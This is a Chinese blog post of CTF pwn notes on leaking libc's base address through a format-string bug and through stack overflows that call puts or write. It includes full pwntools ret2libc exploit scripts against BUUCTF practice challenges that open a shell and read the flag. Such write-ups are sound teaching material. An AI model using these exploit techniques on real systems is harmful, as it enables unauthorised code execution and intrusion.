泄漏libc基地址

最新推荐文章于 2024-07-17 17:20:20 发布
最新推荐文章于 2024-07-17 17:20:20 发布
阅读量999 收藏 27
点赞数 22
分类专栏: pwn 文章标签: pwn ctfer 笔记 ret2libc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/139380709
版权

拿libc基地址

方法一:格式化字符串

  1. 格式化字符串,首先确定输入的 AAAA 在栈上的位置(x)。
  2. 使用 elf.got[fun] 获得got地址。
  3. 利用格式化字符串,构造payload泄漏got地址处的值,recv接受到的字符串中,[4:8]即为fun函数的地址fun_addr。
    • payload = p32(got) + b’%x$s’
    • fun_address = u32(p.recvuntil(b’\xf7’)[4:8])
  4. 利用 LibcSearcher 选择libc的版本。
  5. 最后计算libc的基地址: libcbase = fun_addr - libc.dump(“fun”)
  6. 最后根据基地址libcbase即可计算system函数的绝对地址:
    • sys_addr = libcbase + libc.dump(“system”)
    • sh_addr = libcbase + libc.dump(“str_bin_sh”)
  7. 最后根据获得到的地址即可构造ROP链。
实例:
from pwn import *
from LibcSearcher import *
p=process("./test3")
elf=p.elf

fun_name="read"

#get the fun'got_address
fun_got=elf.got[fun_name]  #0x804c004
fun_plt=elf.plt[fun_name]  #0x8049040
print(hex(fun_got),hex(fun_plt))

p.recvuntil(b"hello\n")

#yichu
payload = p32(0x804c004) + b'%10$s'
p.sendline(payload)


fun_address = u32(p.recvuntil(b'\xf7')[4:8])
print("fun_address:",hex(fun_address))

#base_address
libc = LibcSearcher(fun_name,fun_address)
libc_base = fun_address - libc.dump(fun_name)
print("libc_base :",hex(libc_base))

#get system address and shell address
sys_address = libc_base + libc.dump('system')
sh_address  = libc_base + libc.dump('str_bin_sh')
print("system address:",hex(sys_address))
print("bin_sh address:",hex(sh_address))

方法二:栈溢出

image-20240529174702310

  1. 利用 puts函数 ,泄漏一个函数的got地址,然后输出got地址处的数据,即为该函数的真实地址。
  2. 首先确定栈溢出的位置:ida中查看栈的位置,确定好溢出的偏移。

image-20240529175118360

  1. 使用 ELF.got[fun_name],ELF.plt[‘puts’] ,泄漏 fun_name的got地址和 puts函数的plt地址

  2. 利用栈溢出、got地址、puts函数的plt地址来输出got地址处的值,即fun_name函数的地址:

    • 64位下puts参数传递:利用 rdi寄存器 传递参数,使用指令 **ROPgadget --binary xxx --only ‘pop|ret’ ** 拿到ret_addr用来给rdi传参。
    • 构造 payload = b’a’*(offset)+p64(ret_addr)+p64(got)+p64(puts_plt)+p64(ret)
    • 其中 got 是给调用puts函数是传递的参数,puts_plt是用来调用puts函数,最后ret是执行完puts函数后返回的地址可斟酌选择。(一般用 puts函数 输出 puts函数的地址
    • sendline完成,recv接受fun_name函数的地址: addr=u64(p.recv(6).ljust(0x8,b’\x00’)),其中recv(6)表示只接受6字节的数据, ljust 将接受到的数据 左对齐 ,并且 长度位8个字节 (保证u64转化位无符号整数时满64bit即8字节,否则会报错),不足的用00补充。
    • 然后同样使用 libc = LibcSearcher(‘puts’,addr),libcbase = addr - libc.dump(‘puts’) 选择libc版本计算libc的基地址libcbase。
    • 最后计算 system函数str_bin_sh 的地址:
      • sys_addr = libcbase + libc.dump(‘system’),sh_addr = libcbase + libc.dump(‘str_bin_sh’)

    image-20240529180635845

    实例:

    1. 题目:BUUCTF在线评测 (buuoj.cn)

    2. EXP:

      from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')

p=remote("node5.buuoj.cn",29996)

elf = ELF('./ciscn_2019_c_1')
ret_address = 0x400c83

got = elf.got['puts']		#0x602020
plt = elf.plt['puts']
#print(hex(got))
main_address = 0x400B28
p.recv()
p.sendline(b'1')
p.recvuntil(b"encrypted\n")

payload = (b'a'*(0x50+8))+p64(ret_address)+p64(got)+p64(plt)+p64(main_address)
p.sendline(payload)
p.recvuntil(b'Ciphertext\n')
p.recvuntil(b'\n')
addr=u64(p.recv(6).ljust(0x8,b'\x00'))
print(hex(addr))
libc = LibcSearcher('puts',addr)
libcbase = addr - libc.dump('puts')
print(hex(libcbase))
sys_addr = libcbase + libc.dump('system')
sh_addr = libcbase + libc.dump('str_bin_sh')

p.recv()
p.sendline(b'1')
p.recvuntil(b"encrypted\n")
payload = b'a'*0x58+p64(ret_address)+p64(sh_addr)+p64(0x4006B9)+p64(sys_addr)
p.sendline(payload)
p.interactive()

方法3:

1. write函数溢出(题目里面给出libc的版本)

  1. 利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。

  2. 先看汇编下调用write函数时参数的传递:(以32位为例)长度+地址+1 构造栈时反过来 1+地址+长度

    image-20240530091712374

  3. 溢出EXP:

    #启动题目所给的so文件,so文件需要在同一目录下
libc=ELF('libc-2.23.so')
got = elf.got['write']
plt = elf.plt['write']
main_addr = 0x08048825

#构造payload,利用write函数输出write函数的实际地址
payload = b'a'*(0xe7+4)+p32(plt)+p32(main_addr)+p32(1)+p32(got)+p32(4)
p.sendline(payload)
#接受返回的地址
addr = u32(p.recv(4).ljust(4,b'\x00'))
print(hex(addr))

  4. 利用返回的地址计算liba_base,sys_addr,bin_addr地址:

    #计算基地址libabase
libcbase = addr - libc.sym['write']
#拿到sys_addr和bin_addr
sys_addr = libcbase + libc.sym['system']
str_sh   = libcbase + next(libc.search('/bin/sh'))
print(hex(sys_addr),hex(str_sh))

#最后利用计算的函数地址和'bin/sh'地址,栈溢出构造ROP
payload = b'a'*(0xe7+4)+p32(sys_addr)+p32(0)+p32(str_sh)
p.sendline(payload)
p.interactive()
2. write函数溢出(题目没给给出libc的版本)

  1. 题目地址:BUUCTF在线评测 (buuoj.cn)

  2. 题目没有提供后门函数,但是给了栈溢出和write函数调用:

    image-20240601105706072

    image-20240601104919755

  3. 这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面 没有调用过write函数 ,也可以 直接利用栈溢出 泄漏,因为在栈溢出时,程序会先解析write函数的地址将其填入got表项中:

    from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')

p=remote("node5.buuoj.cn",28334)
elf=ELF('./2018_rop')
got = elf.got['write']
plt = elf.plt['write']
print(hex(got),hex(plt))
main_addr = 0x080484C6

#这里程序会跳转到write函数的plt表,由于先前没有调用过write函数,所以此时write函数的got表还未填充地址,要调用write函数,程序会先解析write函数的地址(此时wrie函数的got表会更新),也就能泄漏write函数的地址了。
payload = b'a'*(0x88+4)+p32(plt)+p32(main_addr)+p32(1)+p32(got)+p32(4)
p.sendline(payload)
addr = u32(p.recv())
print(hex((addr)))

libc = LibcSearcher('write',addr)
liba_base = addr - libc.dump('write')
sys_addr = liba_base + libc.dump('system')
sh_addr  = liba_base + libc.dump('str_bin_sh')
print(hex(liba_base),hex(sys_addr),hex(sh_addr))


payload = b'a'*(0x88+4)+p32(sys_addr)+p32(0)+p32(sh_addr)
p.sendline(payload)

p.sendline(b'cat flag')
p.interactive()

    image-20240601110334585

波克比QWQ
关注
  • 22
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF泄漏libc基址的方法
liucc09的博客
01-05 3982
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
简单格式化字符串漏洞
2301_81031055的博客
02-19 561
经过分析之后,我们可以通过格式化字符串漏洞将puts函数的got表改成main函数,这样的话,当程序执行puts函数的时候实际上是执行main函数,就会再次利用read函数以及printf函数。接下来我们先寻找函数的偏移(指令为:AAAA%p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p)通过调试会发现偏移为11,此时打印出来的就为canary的地,然后我们发送v4的时候将canary发送过去就会获取后门。
linux 格式化字符串漏洞
sky123博客
02-04 2092
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列表格式化输出到stdout vfprintf 根据参数列表格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 常用格式化字符串形式 %[p
PWN学习】如何获取libc基址
Morphy_Amo的博客
12-09 7981
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5826
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 476
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地(任意)第二次修改printf的返回地为one_gadget去getshell。
libc-2.24源代码
02-06
libc-2.24源代码
libc.so.6 libc.so.6
05-31
当一个程序运行时,如果依赖`libc.so.6`,那么操作系统会按照ELF(Executable and Linkable Format)文件中的信息找到这个库,并将其加载到进程的地空间。动态链接器(通常是ld-linux.so)负责解析符号引用,将...
musl libc 源码实现
02-22
musl libc 是一个轻量级的 C 标准库实现,与其他 C 标准库有着一些显著的区别和特点。 它非常适合用于嵌入式系统的开发。嵌入式系统通常对资源消耗有较高要求,而 musl libc 的小体积和高效性使得它成为开发嵌入式...
Open BSD libc 源码
02-22
OpenBSD libc 是 OpenBSD 操作系统自带的 C 标准库实现,它与其他 C 标准库有着一些显著的区别和特点,下面是一些主要的特点: 安全性优先:OpenBSD libc 重视系统安全和可靠性,将其作为设计的首要目标。libc 的...
libc_libc_zip_源码
10-04
《glibc GNU C库与ZIP源码解析》 在深入探讨glibc GNU C库与ZIP文件格式之前,我们首先需要理解这两个概念的基础知识。glibc,全称GNU C Library,是Linux操作系统上最广泛使用的C语言运行时库,它提供了各种系统...
BUUCTF axb_2019_fmt32 & fmt64
最新发布
zwb2603096342的博客
07-17 1186
格式化字符串漏洞,fmt32和fmt64位
格式化字符串漏洞泄露got表
Fzuim的博客
11-20 690
#include <stdio.h> int main() { char s[100]; scanf("%s", s); printf(s); return 0; } 编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c 泄露的payload先贴出来,再理解 # coding:utf-8 from pwn import* from LibcSearcher import * context.log_level = '
格式化字符串漏洞原理理解
Ttw_
03-16 511
在X86结构下,格式化字符串的参数通过栈传递,根据cdecl的调用约定,在进入printf函数前,程序将参数从右往左依次压栈;使用多个%s当作printf的格式化字符串参数即可让程序触发崩溃,原因是%s会让printf从栈中获取一个数字并将其当作一个地,当该数字不是一个地时,或该地受到保护,都会使程序触发崩溃。攻击者使用类似"%s"的格式规范就可以泄露出参数(指针)所指向内存的数据,如果攻击者可以操纵这个参数的值,那么就可以泄露任意地的内容。我们可以通过%7$p来打印我们输入的一个双字的内容。
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1564
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
PWN入门之libc
weixin_44681716的博客
03-24 2684
这次的实验的前提的我们不知道system和bin/sh的函数,然后通过泄露某个函数在libc表中的地,再加上这几个函数的偏移量来计算system和bin/sh的地,最后将这个地覆盖到ret上,以便能跳至我们想要的函数,最终获得shellcode 我们还是以pwn举例 1、 ...
格式化字符串漏洞利用之泄露canary
weixin_44113469的博客
03-31 1514
两道格式化字符串漏洞利用入门题,绕过canary的一种姿势,不知道写的对不对,请大家多指正。 0x01 Canary 保护 开启了NX和canary。 题目分析 有个getshell函数,vuln函数里面明显的栈溢出和格式化字符串漏洞,所以可以利用printf函数泄露出canary的值,然后利用栈溢出填充canary,控制返回指针执行getshell函数。 栈 从栈的情况看,var_8...
泄露libc
inquisiter
01-12 1535
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地是一个libc中的地,利用格式化字符串漏洞能泄露出libc基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
如何泄露libc真实地
05-24
泄露libc真实地的方法通常是通过利用格式化字符串漏洞或者堆溢出漏洞来实现的。 对于格式化字符串漏洞,可以通过向一个可输出的字符串传递一个格式化字符串控制参数,来读取栈上的信息。通过这种方式,可以读取到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值